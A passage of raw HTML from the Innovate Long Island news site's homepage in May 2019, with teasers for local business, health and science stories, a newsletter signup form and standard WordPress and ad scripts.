http://www.innovateli.com/wp/wp-content/uploads/2019/05/moon-man-2-373x210.jpg 373w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/moon-man-2-120x67.jpg 120w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/moon-man-2.jpg 900w" sizes="(max-width: 180px) 100vw, 180px" /></a> </div> <p class="entry-meta"><span><a href="http://www.innovateli.com/category/news/space/" rel="category tag">Space</a></span></p> <h3 class="content-grid-title"><a href="http://www.innovateli.com/as-apollo-anniversary-approaches-mission-time-at-coa/" title="As Apollo anniversary nears, mission time at CoA" rel="bookmark">As Apollo anniversary nears, mission time at CoA</a></h3> </article> <hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-27747 post type-post status-publish format-standard has-post-thumbnail hentry category-energy tag-aertc tag-american-superconductor tag-brookhaven-national-laboratory tag-brookhaven-technology-group tag-cebip tag-high-temperature-superconductor tag-news tag-nextswitch tag-qiang-li tag-slowa-solovyov tag-u-s-department-of-energy"> <div class="content-thumb content-grid-thumb"> <a href="http://www.innovateli.com/switch-set-sbu-superconductivity-startup-soars/" title="&#8216;Switch&#8217; set, superconductivity startup soars"><img width="180" height="101" src="http://www.innovateli.com/wp/wp-content/uploads/2019/05/Sparks-Fly-2-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://www.innovateli.com/wp/wp-content/uploads/2019/05/Sparks-Fly-2-180x101.jpg 180w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Sparks-Fly-2-300x169.jpg 300w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Sparks-Fly-2-768x432.jpg 768w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Sparks-Fly-2-777x437.jpg 777w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Sparks-Fly-2-260x146.jpg 260w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Sparks-Fly-2-373x210.jpg 373w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Sparks-Fly-2-120x67.jpg 120w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Sparks-Fly-2.jpg 900w" sizes="(max-width: 180px) 100vw, 180px" /></a> </div> <p class="entry-meta"><span><a href="http://www.innovateli.com/category/energy/" rel="category tag">Energy</a></span></p> <h3 class="content-grid-title"><a href="http://www.innovateli.com/switch-set-sbu-superconductivity-startup-soars/" title="&#8216;Switch&#8217; set, superconductivity startup soars" rel="bookmark">&#8216;Switch&#8217; set, superconductivity startup soars</a></h3> </article> <hr class="mh-separator content-grid-separator"></div> <hr class="mh-separator hidden-sm"> <div class="mh-section mh-group"> <article class="mh-col mh-1-4 content-grid post-14990 post type-post status-publish format-standard has-post-thumbnail hentry category-earnings tag-1-800-flowers tag-aceto-corp tag-applied-dna-sciences tag-broadridge-financial-solutions tag-chembio-diagnostic-systems tag-comtech-telecommunications-corp tag-cpi-aerostructures tag-earnings tag-enzo-biochem tag-falconstor-software tag-hain-celestial-group tag-henry-schein tag-lakeland-industries tag-lifetime-brands tag-long-island-iced-tea-corp tag-misonix tag-msc-industrial-supply-co tag-napco-security-technologies tag-nathans-famous tag-national-response-corp tag-new-york-community-bank tag-news tag-orbit-international-corp tag-park-electrochemical tag-planet-payment tag-systemax tag-veeco-instruments-inc tag-verint-systems tag-voxx-international-corp"> <div class="content-thumb content-grid-thumb"> <a href="http://www.innovateli.com/earnings-report/" title="&#8216;Off&#8217; 1Q all part of the plan for Chembio, Henry Schein"><img width="180" height="101" src="http://www.innovateli.com/wp/wp-content/uploads/2019/05/Henry-Schein-Nasdaq-2-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://www.innovateli.com/wp/wp-content/uploads/2019/05/Henry-Schein-Nasdaq-2-180x101.jpg 180w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Henry-Schein-Nasdaq-2-300x169.jpg 300w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Henry-Schein-Nasdaq-2-768x432.jpg 768w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Henry-Schein-Nasdaq-2-777x437.jpg 777w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Henry-Schein-Nasdaq-2-260x146.jpg 260w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Henry-Schein-Nasdaq-2-373x210.jpg 373w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Henry-Schein-Nasdaq-2-120x67.jpg 120w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Henry-Schein-Nasdaq-2.jpg 900w" sizes="(max-width: 180px) 100vw, 180px" /></a> </div> <p class="entry-meta"><span><a href="http://www.innovateli.com/category/news/earnings/" rel="category tag">Earnings</a></span></p> <h3 class="content-grid-title"><a href="http://www.innovateli.com/earnings-report/" title="&#8216;Off&#8217; 1Q all part of the plan for Chembio, Henry Schein" rel="bookmark">&#8216;Off&#8217; 1Q all part of the plan for Chembio, Henry Schein</a></h3> </article> <hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-5807 post type-post status-publish format-standard has-post-thumbnail hentry category-calendar tag-calendar tag-news"> <div class="content-thumb content-grid-thumb"> <a href="http://www.innovateli.com/stuff-going-robots-growth-hacking-doesnt-love-roger-tilles/" title="Stuff we&#8217;re thinking about going to"><img width="180" height="101" src="http://www.innovateli.com/wp/wp-content/uploads/2019/05/Online-presence-2-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://www.innovateli.com/wp/wp-content/uploads/2019/05/Online-presence-2-180x101.jpg 180w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Online-presence-2-300x169.jpg 300w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Online-presence-2-768x432.jpg 768w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Online-presence-2-777x437.jpg 777w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Online-presence-2-260x146.jpg 260w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Online-presence-2-373x210.jpg 373w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Online-presence-2-120x67.jpg 120w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Online-presence-2.jpg 900w" sizes="(max-width: 180px) 100vw, 180px" /></a> </div> <p class="entry-meta"><span><a href="http://www.innovateli.com/category/news/calendar/" rel="category tag">Calendar</a></span></p> <h3 class="content-grid-title"><a href="http://www.innovateli.com/stuff-going-robots-growth-hacking-doesnt-love-roger-tilles/" title="Stuff we&#8217;re thinking about going to" rel="bookmark">Stuff we&#8217;re thinking about going to</a></h3> </article> <hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-27693 post type-post status-publish format-standard has-post-thumbnail hentry category-health tag-bradley-trivax tag-island-fertility tag-james-stelling tag-lauren-safier tag-margaret-mcgovern tag-news tag-richard-bronson tag-stony-brook-advanced-specialty-care tag-stony-brook-medicine"> <div class="content-thumb content-grid-thumb"> <a href="http://www.innovateli.com/and-baby-makes-30-as-asc-adds-new-fertility-clinic/" title="And baby makes 30, as ASC adds new fertility clinic"><img width="180" height="101" src="http://www.innovateli.com/wp/wp-content/uploads/2019/05/baby-2-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://www.innovateli.com/wp/wp-content/uploads/2019/05/baby-2-180x101.jpg 180w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/baby-2-300x169.jpg 300w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/baby-2-768x432.jpg 768w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/baby-2-777x437.jpg 777w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/baby-2-260x146.jpg 260w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/baby-2-373x210.jpg 373w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/baby-2-120x67.jpg 120w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/baby-2.jpg 900w" sizes="(max-width: 180px) 100vw, 180px" /></a> </div> <p class="entry-meta"><span><a href="http://www.innovateli.com/category/news/health/" rel="category tag">Health</a></span></p> <h3 class="content-grid-title"><a href="http://www.innovateli.com/and-baby-makes-30-as-asc-adds-new-fertility-clinic/" title="And baby makes 30, as ASC adds new fertility clinic" rel="bookmark">And baby makes 30, as ASC adds new fertility clinic</a></h3> </article> <hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-27669 post type-post status-publish format-standard has-post-thumbnail hentry category-health tag-anvisa tag-bio-manguinhos tag-chembio-diagnostics tag-dengue-virus tag-john-sperzel-iii tag-news tag-pan-american-health-organization tag-world-health-organization tag-zika-virus"> <div class="content-thumb content-grid-thumb"> <a href="http://www.innovateli.com/chembios-dengue-field-test-earns-brazilian-nod/" title="Chembio&#8217;s dengue field test earns Brazilian nod"><img width="180" height="101" src="http://www.innovateli.com/wp/wp-content/uploads/2019/05/Dengue-3-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://www.innovateli.com/wp/wp-content/uploads/2019/05/Dengue-3-180x101.jpg 180w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Dengue-3-300x169.jpg 300w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Dengue-3-768x432.jpg 768w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Dengue-3-777x437.jpg 777w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Dengue-3-260x146.jpg 260w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Dengue-3-373x210.jpg 373w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Dengue-3-120x67.jpg 120w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Dengue-3.jpg 900w" sizes="(max-width: 180px) 100vw, 180px" /></a> </div> <p class="entry-meta"><span><a href="http://www.innovateli.com/category/news/health/" rel="category tag">Health</a></span></p> <h3 class="content-grid-title"><a href="http://www.innovateli.com/chembios-dengue-field-test-earns-brazilian-nod/" title="Chembio&#8217;s dengue field test earns Brazilian nod" rel="bookmark">Chembio&#8217;s dengue field test earns Brazilian nod</a></h3> </article> <hr class="mh-separator content-grid-separator"></div> <hr class="mh-separator hidden-sm"> </div></div><div class="sb-widget"><p><a href="https://lp.adelphi.edu/academic-and-creative-research/"><img class="alignnone size-full wp-image-24056" src="http://www.innovateli.com/wp/wp-content/uploads/2018/11/19595_V2_2.jpg" alt="" width="728" height="90" srcset="http://www.innovateli.com/wp/wp-content/uploads/2018/11/19595_V2_2.jpg 728w, http://www.innovateli.com/wp/wp-content/uploads/2018/11/19595_V2_2-300x37.jpg 300w" sizes="(max-width: 728px) 100vw, 728px" /></a></p> </div> <div class="mh-section mh-group"> <div class="mh-col mh-1-2 home-2"> <div class="sb-widget"> <div class="mh-cp-widget clearfix"> <article class="cp-wrap cp-large clearfix"> <div class="cp-thumb-xl"> <a href="http://www.innovateli.com/at-rmf-new-legal-alternatives-for-court-weary-clients/" title="At RMF, new legal alternatives for court-weary clients"><img width="373" height="210" src="http://www.innovateli.com/wp/wp-content/uploads/2019/05/JeffWurst-2-373x210.jpg" class="attachment-cp-thumb-xl size-cp-thumb-xl wp-post-image" alt="" srcset="http://www.innovateli.com/wp/wp-content/uploads/2019/05/JeffWurst-2-373x210.jpg 373w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/JeffWurst-2-300x169.jpg 300w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/JeffWurst-2-768x432.jpg 768w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/JeffWurst-2-777x437.jpg 777w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/JeffWurst-2-180x101.jpg 180w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/JeffWurst-2-260x146.jpg 260w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/JeffWurst-2-120x67.jpg 120w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/JeffWurst-2.jpg 900w" sizes="(max-width: 373px) 100vw, 373px" /></a> </div> <p class="entry-meta"><span class="updated">May 8, 2019</span></p> <h3 class="cp-title-xl"><a href="http://www.innovateli.com/at-rmf-new-legal-alternatives-for-court-weary-clients/" title="At RMF, new legal alternatives for court-weary clients" rel="bookmark">At RMF, new legal alternatives for court-weary clients</a></h3> <div class="cp-excerpt-xl"> <p>By GREGORY ZELLER // A top Long Island law firm has significantly expanded its business-focused legal services, with a senior partner heading a new practice group determined to stear clear of the courtroom. Uniondale-based Ruskin Moscou Faltischek on Tuesday announced its new Alternative Dispute Resolution Practice Group, chaired by Senior Partner Jeffrey Wurst, who already co-chairs the firm’s Financial Services, Banking and Bankruptcy Practice Group. Less interested in telling it to the judge than negotiating&#8230;</p> <a class="button" href="http://www.innovateli.com/at-rmf-new-legal-alternatives-for-court-weary-clients/"> <span>Read More</span> </a> </div> </article> <hr class="mh-separator"> </div></div> </div> <div class="mh-col mh-1-2 home-3"> <div class="sb-widget"> <div class="mh-cp-widget clearfix"> <article class="cp-wrap cp-large clearfix"> <div class="cp-thumb-xl"> <a href="http://www.innovateli.com/as-applications-soar-adelphi-stresses-multiculturalism/" title="As applications soar, Adelphi stresses multiculturalism"><img width="373" height="210" src="http://www.innovateli.com/wp/wp-content/uploads/2019/05/Adelphi-College-Day-2018-2-373x210.jpg" class="attachment-cp-thumb-xl size-cp-thumb-xl wp-post-image" alt="" srcset="http://www.innovateli.com/wp/wp-content/uploads/2019/05/Adelphi-College-Day-2018-2-373x210.jpg 373w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Adelphi-College-Day-2018-2-300x169.jpg 300w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Adelphi-College-Day-2018-2-768x432.jpg 768w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Adelphi-College-Day-2018-2-777x437.jpg 777w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Adelphi-College-Day-2018-2-180x101.jpg 180w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Adelphi-College-Day-2018-2-260x146.jpg 260w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Adelphi-College-Day-2018-2-120x67.jpg 120w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Adelphi-College-Day-2018-2.jpg 900w" sizes="(max-width: 373px) 100vw, 373px" /></a> </div> <p class="entry-meta"><span class="updated">May 7, 2019</span></p> <h3 class="cp-title-xl"><a href="http://www.innovateli.com/as-applications-soar-adelphi-stresses-multiculturalism/" title="As applications soar, Adelphi stresses multiculturalism" rel="bookmark">As applications soar, Adelphi stresses multiculturalism</a></h3> <div class="cp-excerpt-xl"> <p>By GREGORY ZELLER // With applications to Adelphi University rising fast – and the university’s student body diversifying rapidly – the school is already reaching out to tomorrow’s multicultural applicants. Middle and high school students from across New York City will get a taste of the suburban college experience this week, courtesy of Adelphi, which hosts its sixth-annual College Awareness Day Thursday. The event will give youngsters from 10 Manhattan, Brooklyn and Queens schools a&#8230;</p> <a class="button" href="http://www.innovateli.com/as-applications-soar-adelphi-stresses-multiculturalism/"> <span>Read More</span> </a> </div> </article> <hr class="mh-separator"> </div></div> </div> </div> </div> <aside class="home-sidebar"> <div class="sb-widget"><h4 class="widget-title"><span>2019 Innovator of the Year Awards</span></h4><div style="width:100%;" class="wp-video"><!--[if lt IE 9]><script>document.createElement('video');</script><![endif]--> <video class="wp-video-shortcode" id="video-106-1" preload="metadata" controls="controls"><source type="video/youtube" src="https://www.youtube.com/watch?v=gXt5b4xZDoA&#038;_=1" /><a href="https://www.youtube.com/watch?v=gXt5b4xZDoA">https://www.youtube.com/watch?v=gXt5b4xZDoA</a></video></div></div><div class="sb-widget"><h4 class="widget-title"><span><a href="http://www.innovateli.com/category/newsletters/" class="widget-title-link">Latest Newsletter</a></span></h4> <div class="mh-cp-widget clearfix"> <article class="cp-wrap cp-large clearfix"> <div class="cp-thumb-xl"> <a href="http://www.innovateli.com/no-405-on-farmingdale-states-new-feeder-stony-brooks-super-switch-and-adelphis-major-minor-upgrade/" title="No. 405: On Farmingdale State’s new feeder, Stony Brook’s super switch and Adelphi’s major minor upgrade"><img width="373" height="210" src="http://www.innovateli.com/wp/wp-content/uploads/2019/05/wavy3333-373x210.jpg" class="attachment-cp-thumb-xl size-cp-thumb-xl wp-post-image" alt="" srcset="http://www.innovateli.com/wp/wp-content/uploads/2019/05/wavy3333-373x210.jpg 373w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/wavy3333-777x437.jpg 777w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/wavy3333-180x101.jpg 180w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/wavy3333-260x146.jpg 260w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/wavy3333-120x67.jpg 120w" sizes="(max-width: 373px) 100vw, 373px" /></a> </div> <p class="entry-meta"><span class="updated">May 15, 2019</span></p> <h3 class="cp-title-xl"><a href="http://www.innovateli.com/no-405-on-farmingdale-states-new-feeder-stony-brooks-super-switch-and-adelphis-major-minor-upgrade/" title="No. 405: On Farmingdale State’s new feeder, Stony Brook’s super switch and Adelphi’s major minor upgrade" rel="bookmark">No. 405: On Farmingdale State’s new feeder, Stony Brook’s super switch and Adelphi’s major minor upgrade</a></h3> <div class="cp-excerpt-xl"> <p>&nbsp; Cold open: Beware the Ides of March, dear reader – oh, wait, it’s the Ides of May. It only feels like March. But it’s actually May 15 out there, midpoint of the month, two-thirds of the way through spring and halfway home in this latest (chilly) week of socioeconomic innovation. For the record, as of Tuesday afternoon, the Weather Channel was forecasting that high temperatures on Long Island wouldn’t exceed 70 degrees until the&#8230;</p> <a class="button" href="http://www.innovateli.com/no-405-on-farmingdale-states-new-feeder-stony-brooks-super-switch-and-adelphis-major-minor-upgrade/"> <span>Read More</span> </a> </div> </article> <hr class="mh-separator"> <article class="cp-wrap cp-small clearfix"> <div class="cp-thumb-small"> <a href="http://www.innovateli.com/no-404-chembios-brazilian-breakthrough-fertile-ground-in-commack-and-a-west-coast-cameo-plus-scampi-for-all/" title="No. 404: Chembio’s Brazilian breakthrough, fertile ground in Commack and a West Coast cameo – plus, scampi for all!"><img width="120" height="67" src="http://www.innovateli.com/wp/wp-content/uploads/2019/05/morehead44-120x67.jpg" class="attachment-cp-thumb-small size-cp-thumb-small wp-post-image" alt="" srcset="http://www.innovateli.com/wp/wp-content/uploads/2019/05/morehead44-120x67.jpg 120w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/morehead44-777x437.jpg 777w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/morehead44-180x101.jpg 180w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/morehead44-260x146.jpg 260w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/morehead44-373x210.jpg 373w" sizes="(max-width: 120px) 100vw, 120px" /></a> </div> <p class="entry-meta"><span class="updated">May 10, 2019</span></p> <h3 class="cp-title-small"><a href="http://www.innovateli.com/no-404-chembios-brazilian-breakthrough-fertile-ground-in-commack-and-a-west-coast-cameo-plus-scampi-for-all/" title="No. 404: Chembio’s Brazilian breakthrough, fertile ground in Commack and a West Coast cameo – plus, scampi for all!" rel="bookmark">No. 404: Chembio’s Brazilian breakthrough, fertile ground in Commack and a West Coast cameo – plus, scampi for all!</a></h3> </article> <hr class="mh-separator"> <article class="cp-wrap cp-small clearfix"> <div class="cp-thumb-small"> <a href="http://www.innovateli.com/no-403-on-truman-workforce-development-and-adelphi-diversity-plus-casting-a-new-spellman-in-hauppauge/" title="No. 403: On Truman, workforce development and Adelphi diversity – plus, casting a new Spellman"><img width="120" height="67" src="http://www.innovateli.com/wp/wp-content/uploads/2019/05/attenborough333-120x67.jpg" class="attachment-cp-thumb-small size-cp-thumb-small wp-post-image" alt="" srcset="http://www.innovateli.com/wp/wp-content/uploads/2019/05/attenborough333-120x67.jpg 120w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/attenborough333-300x169.jpg 300w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/attenborough333-768x432.jpg 768w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/attenborough333-777x437.jpg 777w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/attenborough333-180x101.jpg 180w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/attenborough333-260x146.jpg 260w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/attenborough333-373x210.jpg 373w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/attenborough333.jpg 900w" sizes="(max-width: 120px) 100vw, 120px" /></a> </div> <p class="entry-meta"><span class="updated">May 8, 2019</span></p> <h3 class="cp-title-small"><a href="http://www.innovateli.com/no-403-on-truman-workforce-development-and-adelphi-diversity-plus-casting-a-new-spellman-in-hauppauge/" title="No. 403: On Truman, workforce development and Adelphi diversity – plus, casting a new Spellman" rel="bookmark">No. 403: On Truman, workforce development and Adelphi diversity – plus, casting a new Spellman</a></h3> </article> <hr class="mh-separator"> </div></div><div class="sb-widget"><p><a href="https://www.northwell.edu/"><img class="alignleft size-full wp-image-8425" src="http://www.innovateli.com/wp/wp-content/uploads/2016/10/Northwell-Health-Banner-ad_336x280.jpg" alt="northwell-health-banner-ad_336x280" width="336" height="280" srcset="http://www.innovateli.com/wp/wp-content/uploads/2016/10/Northwell-Health-Banner-ad_336x280.jpg 336w, http://www.innovateli.com/wp/wp-content/uploads/2016/10/Northwell-Health-Banner-ad_336x280-300x250.jpg 300w" sizes="(max-width: 336px) 100vw, 336px" /></a></p> </div><div class="sb-widget"> <div class="textwidget"><h4>Newsletter Signup</h4>Free breaking innovation news with a Friday roundup. <style type="text/css"> .cc-input-type-hidden, .has_errors .cc_intro { display:none } html body #cc_form_1 .cc_success { margin:0!important; padding:10px; color: #0a0001!important; } html body #cc_form_1 { line-height: 1; } html body #cc_form_1 ol, html body #cc_form_1 ul { list-style: none; margin:0; padding:0; } html body #cc_form_1 li { list-style: none; } html body #cc_form_1 blockquote, html body #cc_form_1 q { quotes: none; } html body #cc_form_1 blockquote:before, html body #cc_form_1 blockquote:after, html body #cc_form_1 q:before, html body #cc_form_1 q:after { content: ''; content: none; } html body #cc_form_1 :focus { outline: 0; } html body #cc_form_1 .req { cursor: help; } html body #cc_form_1 { background: none transparent; padding: 10px; margin-bottom: 1em; margin-top: 1em; clear:both; float:left; -webkit-background-clip: border-box; -moz-background-clip: border-box; background-clip:border-box; background-origin: border-box; -webkit-background-origin: border-box; -moz-background-origin: border-box; border: solid #194270 0px; -moz-border-radius: 0px 0px; -webkit-border-radius: 0px 0px; border-radius: 0px 0px 0px 0px; width: 100%; max-width: 100%; color: #0a0001!important; font-family: Georgia,'Times New Roman', Times, serif!important; font-size: !important; text-align: left!important; } html body #cc_form_1 * { font-size: ; } html body #cc_form_1 select { max-width: 100%; } .kws_input_fields { text-align: left; } html body #cc_form_1 li { margin:.5em 0; } html body #cc_form_1 ul label { margin: 0; padding:0; line-height:1; cursor: pointer; } html body #cc_form_1 input.t { margin: 0; padding:.3em; line-height:1.1; -moz-border-radius: 2px 2px; -webkit-border-radius: 2px 2px; border-radius: 2px 2px 2px 2px; font-family: Georgia,'Times New Roman', Times, serif; max-width: 95%; } html body #cc_form_1 ::-webkit-input-placeholder { color: #bbb; } html body #cc_form_1 :-moz-placeholder { color: #bbb; } html body #cc_form_1 ::-moz-placeholder { color: #bbb; } html body #cc_form_1 :-ms-input-placeholder { color: #bbb; } html body #cc_form_1 .cc_intro, html body #cc_form_1 .cc_intro * { font-family: Georgia,'Times New Roman', Times, serif; margin:0; padding:0; line-height:1; color: #0a0001; } html body #cc_form_1 .cc_intro * { padding: .5em 0; margin: 0; } html body #cc_form_1 .cc_intro { padding-bottom:0.333em; } html body #cc_form_1 .kws_input_container { padding-top: 1em; } html body #cc_form_1 label { margin-bottom:0.333em; text-align: ; color: #0a0001; font-size: 14px!important; font-family: Georgia,'Times New Roman', Times, serif; display:block; } html body #cc_form_1 .cc_lists li { text-indent: -1.25em; padding-left: 1.4em; } html body #cc_form_1 .submit { display:block; padding-top: 1px; clear:both; float:left; } html body #cc_form_1 label.kws_bold { font-weight:bold; } label.kws_bold input { font-weight:normal; } html body #cc_form_1 label.kws_italic { font-style:italic; } label.kws_italic input { text-style:normal; } .kws_clear { clear:both; } </style><div class="kws_form gform_wrapper" id="cc_form_1"> <form id="constant-contact-signup-1" action="/" method="post"> <div class="kws_input_fields gform_fields"><div class='cc_first_name kws_input_container gfield'><label for='cc_5020312c46_first_name' class=' gfield_label'> Name:<span class="req gfield_required" title="The Name: field is required">*</span></label><input type='text' value='' name='cc-fields[first_name][value]' class='t required' id='cc_5020312c46_first_name' /> <input type="hidden" name="cc-fields[first_name][label]" value="Name:" /> <input type="hidden" name="cc-fields[first_name][req]" value="1" /> </div><div class='cc_email_address kws_input_container gfield'><label for='cc_5020312c46_email_address' class=' gfield_label'> Email Address:<span class="req gfield_required" title="The Email Address: field is required">*</span></label><input type='text' value='' name='cc-fields[email_address][value]' class='t required' id='cc_5020312c46_email_address' /> <input type="hidden" name="cc-fields[email_address][label]" value="Email Address:" /> <input type="hidden" name="cc-fields[email_address][req]" value="1" /> </div><div class='cc_Go kws_input_container gfield'> <label for='cc_5020312c46_Go' class=''> <input type='submit' value='Subscribe' class='b button' id='cc_5020312c46_Go' name='constant-contact-signup-submit' > <div class='kws_clear'></div> </label> </div><div class="cc_newsletter input-text-wrap cc-input-type-hidden"> <input type="hidden" value="1402686944" name="cc-lists[]" /> </div> <input type='submit' style='position:absolute; width:0;height:0;left:-9999px;' name='constant-contact-signup-submit' /> </div> <div> <input type="hidden" id="cc_redirect_url" name="cc_redirect_url" value="" /> <input type="hidden" id="cc_referral_url" name="cc_referral_url" value="%2F" /> <input type="hidden" name="cc_referral_post_id" value="106" /> <input type="hidden" name="uniqueformid" value="5020312c46" /> <input type="hidden" name="ccformid" value="1" /> </div> <div class="kws_clear"></div> <!-- Form Generated by the Constant Contact API WordPress Plugin by Katz Web Services, Inc. --> </form> </div></div> </div><div class="sb-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle" style="display:inline-block;width:336px;height:280px;" data-ad-client="ca-pub-8366076864197308" data-ad-slot="3147839274"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div><div class="sb-widget"><h4 class="widget-title"><span>More Recent Articles</span></h4> <ul class="mh-rp-widget widget-list"> <li class="rp-widget-item"><a href="http://www.innovateli.com/as-applications-soar-adelphi-stresses-multiculturalism/" title="As applications soar, Adelphi stresses multiculturalism" rel="bookmark">As applications soar, Adelphi stresses multiculturalism</a></li> <li class="rp-widget-item"><a href="http://www.innovateli.com/suffolk-ida-steps-up-as-spellman-expands-global-hq/" title="Suffolk IDA steps up as Spellman expands global HQ" rel="bookmark">Suffolk IDA steps up as Spellman expands global HQ</a></li> <li class="rp-widget-item"><a href="http://www.innovateli.com/with-jobs-waiting-island-must-master-apprenticeships/" title="With jobs waiting, Island must master apprenticeships" rel="bookmark">With jobs waiting, Island must master apprenticeships</a></li> <li class="rp-widget-item"><a href="http://www.innovateli.com/no-402-a-machiavellian-mashup-featuring-nyit-grants-farmingdale-state-fairs-and-breezy-bob-catell/" title="No. 402: A Machiavellian mashup featuring NYIT grants, Farmingdale State fairs and ‘Breezy’ Bob Catell" rel="bookmark">No. 402: A Machiavellian mashup featuring NYIT grants, Farmingdale State fairs and ‘Breezy’ Bob Catell</a></li> <li class="rp-widget-item"><a href="http://www.innovateli.com/debrief-catell-consortium-set-to-blow-the-doors-off/" title="Debrief: Catell, consortium set to blow the doors off" rel="bookmark">Debrief: Catell, consortium set to blow the doors off</a></li> </ul></div> </aside> </div> </div> <footer class="mh-footer"> <div class="wrapper-inner clearfix"> </div> <div class="footer-bottom"> <div class="wrapper-inner clearfix"> <nav class="footer-nav clearfix"> <div class="menu-footer-container"><ul id="menu-footer" class="menu"><li id="menu-item-1283" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1283"><a href="http://www.innovateli.com/contact/">Contact</a></li> <li id="menu-item-185" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-185"><a href="mailto:[email protected]">Submit Tips</a></li> <li id="menu-item-169" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-169"><a href="http://www.innovateli.com/about-us/">About Us</a></li> <li id="menu-item-167" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-167"><a href="http://www.innovateli.com/terms/">Terms of Service</a></li> <li id="menu-item-168" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-168"><a href="http://www.innovateli.com/privacy-policy/">Privacy Policy</a></li> </ul></div> </nav> <div class="copyright-wrap"> <p class="copyright">© 2018 Innovate Long Island</p> </div> </div> </div> </footer> <link rel='stylesheet' id='mediaelement-css' href='http://www.innovateli.com/wp/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.6-78496d1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-mediaelement-css' href='http://www.innovateli.com/wp/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=4.9.10' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"http:\/\/www.innovateli.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}}}; /* ]]> */ </script> <script type='text/javascript' src='http://www.innovateli.com/wp/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.5'></script> <script type='text/javascript' src='http://www.innovateli.com/wp/wp-content/plugins/constant-contact-api/lib/form-designer/js/jquery.placeholder.min.js'></script> <script type='text/javascript' src='http://www.innovateli.com/wp/wp-includes/js/wp-embed.min.js?ver=4.9.10'></script> <script type='text/javascript'> var mejsL10n = 